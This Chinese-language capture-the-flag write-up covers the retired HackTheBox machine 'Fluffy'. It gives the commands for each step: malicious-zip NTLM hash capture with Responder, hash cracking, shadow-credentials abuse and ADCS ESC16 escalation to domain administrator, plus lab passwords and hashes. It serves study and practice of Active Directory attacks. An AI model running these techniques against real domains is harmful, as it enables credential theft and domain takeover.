Box信息
| 项目 |
详情 |
| 名称 |
Fluffy |
| 发布日期 |
2025年5月24日 |
| 退役日期 |
2025年9月20日 |
| 操作系统 |
Windows |
| 难度 |
简单 [20分] |
| 创建者 |
ruycr4ft, kavigihan |
场景描述
在真实的Windows渗透测试中,您将从以下账户凭证开始:
j.fleischman / J0elTHEM4n1990!
侦察
初始扫描
nmap发现多个开放的TCP端口:
1
|
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.69
|
端口扫描结果显示这是一个Windows域控制器,域名为fluffy.htb,主机名为DC01。
初始凭证
提供的凭证有效:
1
2
|
oxdf@hacky$ netexec smb dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!'
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
|
ADCS检查
使用netexec模块检查ADCS:
1
|
oxdf@hacky$ netexec ldap dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -M adcs
|
发现存在证书颁发机构fluffy-DC01-CA。
Bloodhound枚举
使用BloodHound.py收集域数据:
1
|
oxdf@hacky$ bloodhound-ce-python -c all -d fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 --zip
|
SMB - TCP 445
发现IT共享具有读写权限:
1
|
oxdf@hacky$ netexec smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
|
IT共享中包含多个zip文件和PDF文档。
认证为p.agila
CVE-2025-24071 / CVE-2025-24054利用
这是一个Windows处理zip存档中library-ms文件的漏洞,会导致向攻击者发起身份验证尝试。
使用POC脚本创建恶意zip文件:
1
|
oxdf@hacky$ uv run --script poc.py 0xdf 10.10.14.6
|
启动Responder监听:
1
|
oxdf@hacky$ sudo uv run /opt/Responder/Responder.py -I tun0
|
上传恶意zip到SMB共享后,获得p.agila的NetNTLMv2哈希。
破解哈希
使用hashcat破解NetNTLMv2哈希:
1
|
$ hashcat p.agila.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
|
获得密码:prometheusx-303
验证凭证有效:
1
2
|
oxdf@hacky$ netexec smb dc01.fluffy.htb -u p.agila -p 'prometheusx-303'
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\p.agila:prometheusx-303
|
Shell作为winrm_svc
枚举
Bloodhound显示p.agila是Service Account Managers组成员,具有对Service Accounts组的GenericAll权限。Service Accounts组对winrm_svc具有GenericWrite权限。
恢复winrm_svc的NTLM
将p.agila添加到Service Accounts组:
1
|
oxdf@hacky$ bloodyAD -u p.agila -p prometheusx-303 -d fluffy.htb --host dc01.fluffy.htb add groupMember 'service accounts' p.agila
|
使用影子凭证攻击:
1
|
oxdf@hacky$ certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account winrm_svc
|
获得winrm_svc的NTLM哈希:33bd09dcd697600edf6b3a7af4875767
WinRM连接
使用evil-winrm连接:
1
|
oxdf@hacky$ evil-winrm-py -i dc01.fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
|
获得user.txt:e3f68cd8************************
Shell作为Administrator
枚举
Service Accounts组成员对ca_svc具有GenericWrite权限,ca_svc是Cert Publishers组成员。
ADCS漏洞检查
使用certipy检查漏洞:
1
|
oxdf@hacky$ certipy find -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -vulnerable -stdout
|
发现ESC16漏洞:安全扩展被禁用。
ESC16利用
更新UPN
将ca_svc的UPN改为administrator:
1
|
oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn administrator update
|
请求证书
以ca_svc身份请求证书:
1
|
oxdf@hacky$ certipy req -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User
|
恢复UPN
将ca_svc的UPN恢复原状:
1
|
oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn ca_svc@fluffy.htb update
|
认证
使用证书获取管理员权限:
1
|
oxdf@hacky$ certipy auth -dc-ip 10.10.11.69 -pfx administrator.pfx -u administrator -domain fluffy.htb
|
获得管理员NTLM哈希:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
Shell连接
使用evil-winrm连接为管理员:
1
|
oxdf@hacky$ evil-winrm-py -i dc01.fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
|
获得root.txt:c3a85f56************************